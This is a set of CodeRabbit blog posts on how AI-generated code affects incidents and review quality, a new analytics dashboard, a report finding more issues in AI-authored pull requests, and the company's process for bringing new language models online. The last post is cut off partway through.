In short, the combination of faster delivery, heavier reliance on AI, plus less-mature processes in many teams = a higher probability that “something will go wrong.” ## The call is coming from inside the house: We should stop treating outages as anomalies As the data clearly shows, the problem is structural but, as developers, we are conditioned to see each incident as a separate event. Here’s the problem with that approach though: if you treat every outage as a one-off event that happened to some other team, you’ll miss the broader pattern. Change failure rates, environment complexity, and toolchain fragility are all increasing. When you overlay the growing use of AI-generated code, the risk footprint changes. The root of reliability increasingly rests not just on infrastructure, but on how we build, review, test, deploy and operate software, and how we integrate AI into that chain without weakening it. What a big outage like AWS’ camouflages is that the issue isn’t just third party providers, the call is also coming from inside the house. And inside all the houses of all the companies that power your stack. ## What to do about it as an industry (Spoiler: This is not a pitch) This is where a company would typically make their pitch about how, if only AWS had used their product, the outage would never have happened. Billions would not have been lost and everyone would have continued on their day like it was an ordinary Monday. But here’s why it won’t help anyone for us to focus on that: you can’t fix a massive structural problem with a new tool alone. And this is indeed a structural problem. In July, we wrote about what we saw as a worrying trend. Companies were starting to make claims about what [percentage of their code was AI-generated](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated) as though that was a valuable metric to measure. 
Google and Microsoft both claimed that 30% of their new code was being generated by AI. At the time, we wrote: “A metric based purely on volume… doesn’t tell you how much developer time was needed to debug or review the AI-generated code. Without these nuances, a 30% metric means almost nothing about actual efficiency or quality outcomes.” Our suggestion then was that companies shift focus away from an approach that sees all code generated by AI as a good thing and look at AI usage and adoption more holistically, including by relying on metrics that: * Are developed in collaboration with engineers who understand day-to-day workflows. * Align with real productivity and business outcomes, not superficial adoption targets. * Encourage flexible, context-aware experimentation rather than rigid enforcement. That could mean metrics that compare how much time developers spend coding with AI versus how much time they spend debugging, or it could be as simple as tracking how many incidents you have, and their severity and costs, as you increase use of AI on your team. These rules are more likely to lead to holistic metrics that look at both the productivity benefit of faster code generation and its downsides, so companies can better understand the full impact and ROI of AI usage. ## Ways to de-risk AI adoption So, what does that mean for AI usage? Most teams have now integrated AI coding tools into their workflows in ways that benefit them. And the problem might not be AI coding tools themselves but HOW some companies have chosen to adopt them. Many teams are being told they need to use AI to write more code with a goal of increased productivity and then they’re just handed a tool and nothing more. That’s an adoption process designed to make incidents skyrocket. Here are some common sense ways we all need to start thinking about AI coding tool adoption: 1. 
### Properly resource review and QA teams When AI coding tools are advertised as ways to reduce developer time (and developers), it’s not surprising that decision makers make the mistake of thinking they can cut teams now that AI is helping. But that doesn’t address the downstream effects of AI-generated code. One of the most overlooked consequences of adopting AI-assisted coding tools is the sheer increase in code volume they create. Developers can now spin up entire modules in minutes. That speed feels like productivity, but it also means that review and QA pipelines are being overwhelmed. When the number of pull requests doubles but the number of reviewers stays the same, even the best processes begin to fray. To de-risk AI development at scale, organizations need to staff and support review, QA, and testing functions proportionally to the new pace of code generation. That could include AI tools that help with the review and QA work. 2. ### Know what to look for Until recently, we knew that AI introduced more bugs and issues but we didn’t know what kinds of bugs and issues it introduced most often. Now, with our [State of AI vs. Human Code Generation Report,](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) we have those answers. AI, for example, is 2.25x more likely to create algorithmic and business logic errors and 2.29x more likely to have incorrect concurrency control issues. Things like misconfiguration, error and exception handling, and incorrect dependencies are nearly 2x more prevalent as well. Our report is helpful for creating a checklist of what to double-check in relevant PRs so that fewer of these bugs slip through. 3. ### Shift testing and reviews left AI-assisted code introduces a new kind of complexity: it often *looks* correct, compiles cleanly, and passes superficial checks but hides subtle logical or edge-case errors that only surface under specific conditions.
To mitigate this, organizations need to shift testing and reviews as far upstream as possible. Rather than treating QA as a final gate, testing must become a living part of the development loop itself. This means integrating automated unit, integration, and property-based testing directly into the AI generation workflow, sometimes referred to as *continuous verification*. Every code suggestion from an AI assistant should trigger lightweight checks before it even reaches a human reviewer. You can also conduct reviews in your IDE or CLI environments to catch bugs and potential issues before creating a pull request. Then, AI-generated pull requests should be automatically flagged and routed through more rigorous review protocols, including additional static analysis, dependency scanning, and peer oversight. Reviewers should know when a piece of code was generated versus hand-written, not as a stigma, but as a signal that it may need a deeper pass. Some companies are already labeling AI-authored commits or requiring an “AI provenance” tag in the PR description. Other companies are also forbidding the use of AI to write certain kinds of code that are critical for security. 4. ### Expand chaos and resilience testing Traditional testing assumes predictable behavior but AI-assisted systems are increasingly unpredictable. Code generated by large language models can fail in non-obvious ways: mishandling unexpected inputs, producing inconsistent API calls, or creating hidden performance bottlenecks that only reveal themselves under load. That’s why many engineering teams are expanding chaos and resilience testing beyond infrastructure to encompass the *application layer* itself. By running failure-injection experiments in staging environments such as intentionally breaking components, throttling dependencies, or introducing malformed data, teams can observe how AI-generated logic behaves under stress. 
These simulations expose weak assumptions baked into AI-generated code that standard test suites often miss. Pairing chaos testing with automated rollback mechanisms, canary deployments, and progressive delivery ensures that when things do go wrong, the blast radius is small and recoverable. 5. ### **Integrate AI literacy and secure-coding training** Don’t assume developers instinctively know how to use AI safely. The tools may feel intuitive (type a prompt, get working code) but beneath that simplicity lies a set of entirely new failure modes that most engineers were never trained to anticipate. That means providing regular, hands-on training on topics like prompt design, model limitations, and the systemic ways AI-generated code can go wrong. Developers should learn to spot signs of hallucinated functions (calls to APIs that don’t exist), insecure defaults (improper authentication or data handling), and non-deterministic behavior that can make debugging far more complex. They should also understand what the model *doesn’t know*, including its knowledge cutoff, its lack of situational awareness, and its tendency to optimize for plausibility rather than truth. A team that understands how generative tools fail is far less likely to trust them blindly… and far more likely to catch issues before they end up in production. ## We can turn this around in 2026 (yes, there’s hope) The lesson of 2025’s rising incident curve is clear: you can’t automate your way out of accountability. If AI is going to write more code, humans need the time, tools, and headcount to review more code. Otherwise, every efficiency gain on the input side becomes a liability on the output side. Which is something we’re currently seeing writ large as an industry. The goal shouldn’t just be to adopt AI but to adopt it in ways that *actually* help companies. What we’re seeing now in the increased level of incidents is *false velocity*: the illusion of progress that hides compounding defects. 
But that illusion can be corrected. Teams that invest in thoughtful testing, resilient review processes, and a culture of ownership can still realize AI’s potential without paying the price in downtime. And the more teams that do that, the less downtime and incidents we’ll see industry-wide. ***Curious how CodeRabbit could help? Read our*** [***case study on how we helped Clerk***](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) ***or*** [***try our AI reviews***](https://coderabbit.link/tig9AVb) ***today.***

Measuring what matters in the age of AI-assisted development

Sahana Vijaya Prasad — Thu, 18 Dec 2025 00:00:00 GMT

Every engineering leader I talk to is asking the same question: "Is AI actually making us better?" Not "are we using AI" (everyone is). Not "is AI generating code" (it clearly is). And not even, “What percentage of our code is AI generating?” (unless you’re Google or Microsoft and announce this publicly). The real question is whether AI adoption is translating into shipping faster, better quality code and making for more productive and happier engineering teams. The problem is that most tooling gives you vanity metrics. Lines of code generated. Number of AI completions accepted. These tell you nothing about what happens *after* the AI writes code. Does it survive review? Does it ship? Does it break production? CodeRabbit sits at a unique vantage point in the development lifecycle. We review both human-written and AI-generated code. We see what gets flagged, what gets accepted, and what makes it to merge. We watch how teams iterate, how reviewers respond, and where friction accumulates. We’ve been able to see all those things and knew there was value to that for teams, as well. So, today, we are releasing a new analytics dashboard that puts this visibility directly into the hands of engineering leaders. ## The 3 questions every engineering leader asks When teams adopt AI tooling, three questions dominate every conversation with directors, VPs, and platform leads: **1\. Is our review process faster or slower?** AI-generated code often produces more PRs, larger diffs, and different kinds of issues. If your review process cannot keep up, you have not gained velocity. You have created a bottleneck. **2\. Is code quality improving or degrading?** More code is not better code. The question is whether AI-assisted development is catching bugs earlier, reducing security issues, and maintaining the standards your team has set. **3\. How do we prove ROI to the business?** Engineering leaders need to justify tooling spend. Saying "developers like it" is not sufficient. 
You need numbers that connect to business outcomes: time saved, defects prevented, throughput gained. The CodeRabbit Dashboard answers all three. ### What CodeRabbit’s Dashboard shows %[https://youtu.be/3ytbvTjG8ic] The dashboard is organized into five views, each designed to answer a different class of question. Let me walk through what engineering leaders care about most in each section. ## Summary: The Executive View ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d0a5689d72720045b329153719c59be50ebb16004ae7786935e941ffbea4db16_6cf155d097.jpg) The Summary tab gives you the numbers that matter for a leadership update. In the screenshot above, you can see the core metrics at a glance. There were 145 merged PRs from 86 active users over the selected period. This is your throughput baseline. **Median Time to Last Commit:** This measures how long it takes developers to finalize their changes after a PR becomes ready for review. Short times indicate tight feedback loops and clear reviewer expectations. Spikes here often signal bottlenecks. **Reviewer Time Saved:** This metric answers the ROI question. CodeRabbit models the effort of a senior reviewer and estimates how much human review time the AI has offset. For budget conversations, this number translates directly into saved engineering hours. **CodeRabbit Review Comments:** Acceptance rate is the quality signal. A low acceptance rate would indicate noise. A high rate indicates trusted, actionable feedback. If reviewers and authors are acting on CodeRabbit feedback at least half the time, the tool is surfacing relevant issues. The donut charts break down comments by severity (Critical, Major, Minor) and category (Functional Correctness, Maintainability, Security, Data Integrity, Stability). This tells you what *kinds* of problems CodeRabbit is catching. If most comments are Minor/Maintainability, that is a different story than Critical/Security.
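To make the acceptance-rate idea concrete, here is a minimal sketch of how a rate per severity level could be derived from a list of review comments. The comment data and the function name `acceptance_by_severity` are made up for illustration, and this is not a description of how the dashboard computes its numbers internally.

```python
from collections import Counter

# Hypothetical review comments as (severity, accepted) pairs.
# These values are illustrative only and are not real dashboard data.
comments = [
    ("Critical", True), ("Critical", True), ("Critical", False),
    ("Major", True), ("Major", False),
    ("Minor", True), ("Minor", False), ("Minor", False), ("Minor", False),
]


def acceptance_by_severity(items):
    """Return the fraction of accepted comments for each severity level."""
    posted = Counter(severity for severity, _ in items)
    accepted = Counter(severity for severity, ok in items if ok)
    return {severity: accepted[severity] / posted[severity] for severity in posted}


rates = acceptance_by_severity(comments)
overall = sum(ok for _, ok in comments) / len(comments)

for severity, rate in rates.items():
    print(f"{severity}: {rate:.0%} accepted")
print(f"Overall: {overall:.0%} accepted")
```

In this made-up sample the overall rate sits below the "at least half" mark, but the breakdown shows the shortfall comes from Minor comments while Critical ones are mostly acted on. That is the kind of distinction the severity split is meant to surface.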
**Average Review Iterations per PR:** This shows how many cycles a typical PR goes through before merge. High iteration counts can indicate unclear requirements, poor PR quality, or overloaded reviewers. Tracking this over time shows whether your process is tightening or loosening. **Tool Findings:** CodeRabbit surfaces findings from your existing static analysis tools. This consolidates your quality signals into one view. ## Quality Metrics: Where Are the Real Problems? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/83f75463023e22d824b993a74a2ec8dc9ac778785bb26afca8f8efa28dc51f02_60b50f5e19.jpg) The Quality Metrics tab answers: "Is CodeRabbit catching the right things?" **Acceptance Rate by Severity:** This shows how often developers act on CodeRabbit comments at each severity level. Consistent acceptance across severity levels suggests CodeRabbit is calibrated well to your team's standards. **Acceptance Rate by Category**: This breaks it down further: * Data Integrity and Integration * Functional Correctness * Maintainability and Code Quality * Security and Privacy * Stability and Availability These numbers help you understand where CodeRabbit adds the most value. If Security acceptance is low, it might indicate false positives in that category. If Maintainability acceptance is high, developers trust CodeRabbit for code quality guidance. **Bar charts:** These show raw counts: how many comments were posted versus accepted in each category. This gives you more detail about which kinds of comments are being raised and acted on. **Tool Findings:** This breakdown shows which static analysis tools contributed findings, so you know which ones are surfacing the most findings for your codebase. ## Time Metrics: Where does work get stuck? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c305d59de096ef8b8bfbedc6457e9ee0377a35dee7204bd2b1b641b6ac3365db_13cbd7f8f2.jpg) The Time Metrics tab tracks velocity through the review process. 
This is the data you need to find bottlenecks so you can fix them. **Time to Merge:** We measure the full duration from review-ready to merged and report it as an average, a median, and percentiles. Here are the figures in the above example: * Average: 1.2 days * Median: 1.4 hours * P75: 14 hours * P90: 4 days The gap between median and P90 is revealing in the example. Most PRs merge in 1.4 hours, but the slowest 10% take nearly 4 days. That tail is worth investigating. **Time to Last Commit:** This focuses on how long it takes developers to complete their final changes. Here’s the data in the above example: * Average: 2.4 days * Median: 4.5 hours * P75: 2 hours * P90: 5 days Compare this to Time to Merge. If the last commit happens quickly but merge takes much longer, PRs are sitting idle after code is done. That delay often comes from approval bottlenecks, release gates, or unclear ownership. **Time to First Human Review:** How long do PRs wait before a human looks at them? Here’s the example in the screenshot: * Average: 3.4 days * Median: 1.9 hours * P75: 3 hours * P90: 2 days The median here is under 2 hours, but the average is dragged up by outliers. The weekly trend charts on the right side of the dashboard let you track whether these metrics are improving or regressing. ## Organizational Trends: The macro view ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ebe96a9c6128c2808eab73fad6d9bc8d82eb94b171bfe043a963749e4e242f56_ada9e22b90.jpg) The Organizational Trends tab shows patterns over time. **Weekly Pull Requests:** The Created and Merged PRs chart plots your team's throughput. In the screenshot, both created and merged PRs trend downward from mid-November toward December. This could reflect end-of-year slowdown, a shift in project priorities, or an emerging backlog. **Weekly Active Users:** This is where you look for engagement. The chart shows the number of weekly active users fluctuating, with a dip around late October. 
**Weekly Pipeline Failures:** Here you can track CI/CD health. Here the decrease in CodeRabbit users correlates with additional pipeline failures. **Most Active PR Authors and Reviewers:** Here’s where you can identify contribution patterns. In this data, multiple authors are tied for first place on both creating and reviewing PRs. This could indicate that these engineers are all at risk of being overwhelmed which could lead to a backlog. ## Data Metrics: The audit trail ![](https://victorious-bubble-f69a016683.media.strapiapp.com/df1b9a73c3464d049485c8a3a0758ad4b9b19e9936ac8ca2e88e2d59b3f4c67c_69bdf527a0.jpg) The Data Metrics tab provides per-user and per-PR detail for teams that need auditability, coaching insights, or root cause analysis. **Active User Details table:** This shows each developer's activity including PRs created and merged, time to last commit, total comments posted, and acceptance rates broken down by severity. You can see at a glance who is shipping frequently, who has long review cycles, and whose code generates more critical feedback. **Pull Request Details table:** This looks at individual PRs with info about their repository, author, creation time, first human review time, merge time, estimated complexity, reviewer count, and comment breakdown. For any PR that took unusually long or generated unusual feedback patterns, you can dig into the specifics. **Tool Finding Details table:** Here you’ll find a list of every static analysis finding by tool, category, severity, and count. This is useful for identifying which rules generate the most noise and which surface the most value. ## Why this data matters more now We are in a transition period for software development. AI is generating more code than ever. Developers are reviewing code they did not write. Engineering managers are being asked to prove that AI investments are paying off. The organizations that navigate this transition well will be the ones with visibility into their own processes. 
Not just "are we using AI," but "is AI helping us ship better software faster." CodeRabbit is one of the few tools positioned to answer that question. We see the code. We see the reviews. We see what ships. And now, with these dashboards, engineering leaders can see it too. The dashboards are available now for all CodeRabbit users. Filter by repository, user, team, or timeframe to analyze performance in the context that matters most to your organization. If you are an engineering leader trying to measure AI impact, this is where you start. Curious? Try CodeRabbit today with a [14-day free trial.](https://coderabbit.link/WfD06kP)
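For readers who want to see why the Time Metrics tab reports a median and percentiles alongside the average, here is a small sketch of the arithmetic. The durations are hypothetical and the nearest-rank `percentile` helper is our own choice of definition. The dashboard may use a different percentile method.

```python
import math
import statistics

# Hypothetical time-to-merge durations in hours; not taken from the dashboard.
hours = [0.5, 0.8, 1.0, 1.2, 1.4, 1.6, 2.0, 3.0, 14.0, 96.0]


def percentile(values, p):
    """Nearest-rank percentile: the smallest value with at least p% of the data at or below it."""
    ordered = sorted(values)
    rank = math.ceil(p * len(ordered) / 100)
    return ordered[max(rank, 1) - 1]


mean = statistics.mean(hours)
median = statistics.median(hours)
p75 = percentile(hours, 75)
p90 = percentile(hours, 90)

print(f"mean={mean:.2f}h median={median:.1f}h p75={p75:.1f}h p90={p90:.1f}h")
```

With these sample values a single 96-hour PR pulls the mean above the 75th percentile, while the median stays at 1.5 hours. This is the same effect described above, where the average is dragged up by outliers and the tail is what deserves investigation.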

Our new report: AI code creates 1.7x more problems

David Loker — Wed, 17 Dec 2025 00:00:00 GMT

*What we learned from analyzing hundreds of open-source pull requests.* Over the past year, AI coding assistants have gone from emerging tools to everyday fixtures in the development workflow. At many organizations, a part of every code change is now machine-generated or machine-assisted. But while this has been accelerating the speed of development, questions have been quietly circulating: * Why are more defects slipping through into staging? * Why do certain logic or configuration issues keep appearing? * And are these patterns tied to AI-generated code? It appears that AI is playing a significant role. [A recent report](https://go.cortex.io/rs/563-WJM-722/images/2026-Benchmark-Report.pdf?version=0) found that while pull requests per author increased by 20% year-over-year, thanks to help from AI, incidents per pull request increased by 23.5%. This year also brought several high-visibility incidents, postmortems, and anecdotal stories pointing to AI-written changes as a contributing factor. These weren’t fringe cases or misuses. They involved otherwise normal pull requests that simply embedded subtle mistakes. And yet, despite rapid adoption of AI coding tools, there has been surprisingly little concrete data about how AI-authored PRs differ in quality from human-written ones. So, CodeRabbit set out to answer that question empirically in our [**State of AI vs Human Code Generation Report.**](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ## Our State of AI vs Human Code Generation Report We analyzed **470 open-source GitHub pull requests**, including **320 AI-co-authored PRs** and **150 human-only PRs**, using CodeRabbit’s structured issue taxonomy. Every finding was normalized to issues per 100 PRs and we used statistical rate ratios to compare how often different types of problems appeared in each group. The results? 
Clear, measurable, and consistent with what many developers have been feeling intuitively: **AI accelerates output, but it also amplifies certain categories of mistakes.** [READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ### Limitations of our study Getting data on issues that are more prevalent in AI-authored PRs is critical for engineering teams but the challenge was determining which PRs were AI-authored vs human authored. Since it was impossible to directly confirm authorship of each PR of a large enough OSS dataset, we checked for signals that a PR was co-authored by AI and assumed that those that didn’t have it were human authored, for the purposes of the study. This resulted in statistically significant differences in issue patterns between the two datasets, which we are sharing in this study so teams can better know what to look for. However, we cannot guarantee all the PRs we labelled as human authored were actually authored only by humans. Our full methodology is shared at the end of the report. # **Top 10 findings from the report** No issue category was uniquely AI but most categories saw significantly more errors in AI-authored PRs. That means, humans and AI make the same kinds of mistakes. AI just makes many of them more often and at a larger scale. ### **1\. AI-generated PRs contained ~1.7× more issues overall.** Across 470 PRs, AI-authored changes produced **10.83 issues per PR**, compared to **6.45** for human-only PRs. Even more striking: high-issue outliers were much more common in AI PRs, creating heavy review workloads. ### **2\. Severity escalates with AI: More critical and major issues.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c28bcb0762a2fc229e40ffe36e124e39b022beffde7a14f35cd90d4e445403d5_d7452fe252.png) AI PRs show ~**1.4–1.7×** more critical and major findings. ### **3\. 
Logic and correctness issues were 75% more common in AI PRs.** These include business logic mistakes, incorrect dependencies, flawed control flow, and misconfigurations. Logic errors are among the most expensive to fix and most likely to cause downstream incidents. ### **4\. Readability issues spiked more than 3× in AI contributions.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c6617439329bf7ed3f384075dc2714b43a94f446d4847af36202bb1ffa8dbed_8756f91833.png) The single biggest difference across the entire dataset was in readability. AI-produced code often looks consistent but violates local patterns around naming, clarity, and structure. ### **5\. Error handling and exception-path gaps were nearly 2× more common.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/27c568e33eaee6f41e29732d86a22b505da5c9bf5fdac083a4663bf0bda98618_f3c38337ec.png) AI-generated code often omits null checks, early returns, guardrails, and comprehensive exception logic, issues tightly tied to real-world outages. ### **6\. Security issues were up to 2.74× higher** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/88e2d93be61517e548912b6297d5147a352f277dfe63774e0f4c921f49f628d9_92343df4dc.png) The most prominent pattern involved improper password handling and insecure object references. While no vulnerability type was unique to AI, nearly all were amplified. ### **7\. Performance regressions, though small in number, skewed heavily toward AI.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8acef551fea32b1992399f1ec8c55f339362bc12b1ba29b6c483a11693313b66_bc9d338fcb.png) Excessive I/O operations were ~8× more common in AI-authored PRs. This reflects AI’s tendency to favor clarity and simple patterns over resource efficiency. ### **8\. Concurrency and dependency correctness saw ~2× increases.** Incorrect ordering, faulty dependency flow, or misuse of concurrency primitives appeared far more frequently in AI PRs. 
These were small mistakes with big implications.

### **9\. Formatting problems were 2.66× more common in AI PRs.**

Even teams with formatters and linters saw elevated noise: spacing, indentation, structural inconsistencies, and style drift were all more prevalent in AI-generated code.

### **10\. AI introduced nearly 2× more naming inconsistencies.**

Unclear naming, mismatched terminology, and generic identifiers appeared frequently in AI-generated changes, increasing cognitive load for reviewers.

[READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report)

## Why these patterns appear

Why are teams seeing so many issues with AI-generated code? Here’s our analysis:

* **AI lacks local business logic:** Models infer code patterns statistically, not semantically. Without strict constraints, they miss the rules of the system that senior engineers internalize.
* **AI generates surface-level correctness:** It produces code that looks right but may skip control-flow protections or misuse dependency ordering.
* **AI doesn’t adhere perfectly to repo idioms:** Naming patterns, architectural norms, and formatting conventions often drift toward generic defaults.
* **Security patterns degrade without explicit prompts:** Unless guarded, models recreate legacy patterns or outdated practices found in older training data.
* **AI favors clarity over efficiency:** Models often default to simple loops, repeated I/O, or unoptimized data structures.

## What engineering teams can do about it

Adopting AI coding tools isn’t simply about speeding up development. It requires rethinking the guardrails that ensure all code entering production is safe, maintainable, and correct. Based on the patterns in the data, here are the most important takeaways for teams:

### **1\. Give AI the context it needs**

AI makes more mistakes when it lacks business rules, configuration patterns, or architectural constraints.
Provide prompt snippets, repo-specific instruction capsules, and configuration schemas to reduce misconfigurations and logic drift.

### **2\. Use policy-as-code to enforce style**

Readability and formatting were some of the biggest gaps. CI-enforced formatters, linters, and style guides eliminate entire categories of AI-driven issues before review.

### **3\. Add correctness safety rails**

Given the rise in logic and error-handling issues:

* Require tests for non-trivial control flow
* Mandate nullability/type assertions
* Standardize exception-handling rules
* Explicitly prompt for guardrails where needed

### **4\. Strengthen security defaults**

Mitigate elevated vulnerability rates by centralizing credential handling, blocking ad-hoc password usage, and running SAST and security linters automatically.

### **5\. Nudge the model toward efficient patterns**

Offer guidelines for batching I/O, choosing appropriate data structures, and using performance hints in prompts.

### **6\. Adopt AI-aware PR checklists**

Reviewers should explicitly ask:

* Are error paths covered?
* Are concurrency primitives correct?
* Are configuration values validated?
* Are passwords handled via the approved helper?

These questions target the areas where AI is most error-prone.

### **7\. Get help reviewing and testing AI code**

Code review pipelines weren’t created to handle the higher volume of code teams are currently shipping with the help of AI. Reviewer fatigue has been [found to lead to more issues and missed bugs](https://smartbear.com/resources/case-studies/cisco-systems-collaborator/). An AI code review tool like CodeRabbit acts as a third-party source of truth that standardizes quality across the different AI tools a team might use, while reducing the time and cognitive labor needed for reviews.
That allows developers to concentrate on reviewing the more complex parts of the code changes and reduce the amount of bugs and issues that end up in production. [READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ## The bottom line AI coding tools are powerful accelerators, but acceleration without guardrails increases risk. [Our analysis](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) shows that AI-generated code is **consistently more variable**, **more error-prone**, and **more likely to introduce high-severity issues** without the right protections in place. The future of AI-assisted development isn’t about replacing developers. It’s about building systems, workflows, and safety layers that amplify what AI does well while compensating for what it tends to miss. For the teams that want the speed of AI without the surprises, the data is clear: **Quality isn’t automatic. It requires deliberate engineering. Even when using AI tools.** ***An AI code review tool could also help.*** [***Try CodeRabbit today.***](https://app.coderabbit.ai/login???free-trial)

Behind the curtain: What it really takes to bring a new model online at CodeRabbit

David Loker — Fri, 05 Dec 2025 00:00:00 GMT

***When we published*** [***our earlier article***](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable?) ***on why users shouldn't choose their own models, we argued that model selection isn't a matter of preference, it's a systems problem. This post explains exactly why.*** Bringing a new model online at CodeRabbit isn't a matter of flipping a switch; it's a multi-phase, high-effort operation that demands precision, experimentation, and constant vigilance. Every few months, a new large-language model drops with headlines promising “next-level reasoning,” “longer context,” or “faster throughput.” For most developers, the temptation is simple: plug it in, flip the switch, and ride the wave of progress. We know that impulse. But for us, adopting a new model isn’t an act of curiosity, it’s a multi-week engineering campaign. Our customers don’t see that campaign, and ideally, they never should. The reason CodeRabbit feels seamless is precisely because we do the hard work behind the scenes evaluating, tuning, and validating every model before it touches a single production review. This is what it really looks like. ### **1\. The curiosity phase: Understanding the model’s DNA** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d06fc5fabdf2725ee9c698d8f7aaf140b3c2e681ecf963379082ba72a4b1c8d7_17e9180e2a.png) Every new model starts with a hypothesis. We begin by digging into what it claims to do differently: is it a reasoning model, a coding model, or something in between? What’s its architectural bias, its supposed improvements, and how might those capabilities map to our existing review system? We compare those traits against the many model types that power different layers of our context-engineering and review pipeline. 
The question we ask isn’t, “is this new model better?” but, *“where might it fit?”* Sometimes it’s a candidate for high-reasoning diff analysis; other times, for summarization or explanation work. Each of those domains has its own expectations for quality, consistency, and tone. From there, we start generating experiments. Not one or two, but dozens of evaluation configurations across parameters like temperature, context packing, and instruction phrasing. Each experiment feeds into our evaluation harness, which measures both quantitative and qualitative dimensions of review quality. ### **2\. The evaluation phase: Data over impressions** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1bf0887623be9d6eb3a448cdc68ca647a1910e40b94384199d9c83d5d3acb11a_5254cfd783.png) This phase takes time. We run models across our internal evaluation set, collecting hard metrics that span coverage, precision, signal-to-noise, and latency. These are the same metrics that underpin the benchmarks we’ve discussed in earlier posts like [*Benchmarking GPT-5*](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning), [*Claude Sonnet 4.5: Better Performance, but a Paradox*](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox), [*GPT-5.1: Higher signal at lower volume*](https://www.coderabbit.ai/blog/gpt-51-for-code-related-tasks-higher-signal-at-lower-volume?), and [*Opus 4.5: Performs like the systems architect.*](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect?) But numbers only tell part of the story. We also review the generated comments themselves by looking at reasoning traces, accuracy, and stylistic consistency against our current best-in-class reviewers. We use multiple LLM-judge recipes to analyze tone, clarity, and helpfulness, giving us an extra lens on subtle shifts that raw metrics can’t capture. 
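To make the hard metrics above a little more concrete, here is a minimal sketch of how coverage, precision, and latency might be computed for one evaluation run. It is not CodeRabbit's harness: the `ReviewComment` record, the `seeded_issue_id` field, and the metric definitions (coverage as the share of known issues caught, precision as the share of comments that match a known issue) are all assumptions made for illustration.

```python
from dataclasses import dataclass
from statistics import median
from typing import Optional


@dataclass(frozen=True)
class ReviewComment:
    """One model-generated comment (hypothetical record, not a CodeRabbit type)."""
    pr_id: str
    seeded_issue_id: Optional[str]  # ID of the known issue it matches, or None
    latency_ms: float               # time taken to produce the comment


def evaluate_run(comments: list[ReviewComment], known_issues: set[str]) -> dict[str, float]:
    """Compute assumed definitions of coverage, precision, and median latency."""
    # Distinct known issues that at least one comment caught.
    matched = {c.seeded_issue_id for c in comments if c.seeded_issue_id in known_issues}
    # Number of comments that point at a known issue (duplicates count).
    hits = sum(1 for c in comments if c.seeded_issue_id in known_issues)
    return {
        "coverage": len(matched) / len(known_issues) if known_issues else 0.0,
        "precision": hits / len(comments) if comments else 0.0,
        "median_latency_ms": median(c.latency_ms for c in comments) if comments else 0.0,
    }


# Hypothetical sample: four comments across two PRs, four seeded issues.
sample_run = [
    ReviewComment("pr-1", "EP-1", 1200.0),
    ReviewComment("pr-1", None, 900.0),
    ReviewComment("pr-2", "EP-2", 1500.0),
    ReviewComment("pr-2", "EP-2", 1100.0),
]
sample_metrics = evaluate_run(sample_run, {"EP-1", "EP-2", "EP-3", "EP-4"})
```

With this sample, two of the four seeded issues are caught (coverage 0.5) and three of the four comments match a known issue (precision 0.75). Keeping the two numbers separate matters: a model can raise coverage simply by commenting more, which is exactly what precision and signal-to-noise are meant to penalize.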
If you’ve read our earlier blogs, you already know why this is necessary: models aren’t interchangeable. A prompt that performs beautifully on GPT-5 may completely derail on Sonnet 4.5. Each has its own “prompt physics.” Our job is to learn it quickly and then shape it to behave predictably inside our system. ## **3\. The adaptation phase: Taming the differences** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ebcd1df0a8ce0d3a41d0c97510acbb2f7e8af1230cb76003bb77b897d1d31995_94404a7d3a.png) Once we understand where a model shines and where it struggles, we begin tuning. Sometimes that means straightforward prompt adjustments such as fixing formatting drift or recalibrating verbosity. Other times, the work is more nuanced: identifying how the model’s internal voice has changed and nudging it back toward the concise, pragmatic tone our users expect. We don’t do this by guesswork. We’ll often use LLMs themselves to critique their own outputs. For example: “This comment came out too apologetic. Given the original prompt and reasoning trace, what would you change to achieve a more direct result?” This meta-loop helps us generate candidate prompt tweaks far faster than trial and error alone. During this period, we’re also in constant contact with model providers, sharing detailed feedback about edge-case behavior, bugs, or inconsistencies we uncover. Sometimes those conversations lead to model-level adjustments; other times they inform how we adapt our prompts around a model’s quirks. ## **4\. The rollout phase: From lab to live traffic** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/71957c5f42094a34a5dbe3805fedb45842d63ccf4f416074da31bd7a9dc619f3_c23a82a8fa.png) When a model starts to perform reliably in offline tests, we move into phased rollout. First, we test internally. Our own teams see the comments in live environments and provide qualitative feedback. Then, we open an early-access phase with a small cohort of external users. 
Finally, we expand gradually using a randomized gating mechanism so that traffic is distributed evenly across organization types, repo sizes, and PR complexity.

Throughout this process, we monitor everything:

* Comment quality and acceptance rates
* Latency, error rates, and timeouts
* Changes in developer sentiment or negative reactions to CodeRabbit comments
* Precision shifts in suggestion acceptance

If we see degradation in any of these signals, we roll back immediately or limit exposure while we triage. Sometimes it’s a small prompt-level regression; other times, it’s a subtle style drift that affects readability. Either way, we treat rollout as a living experiment, not a switch-flip.

## **5\. The steady-state phase: Continuous vigilance**

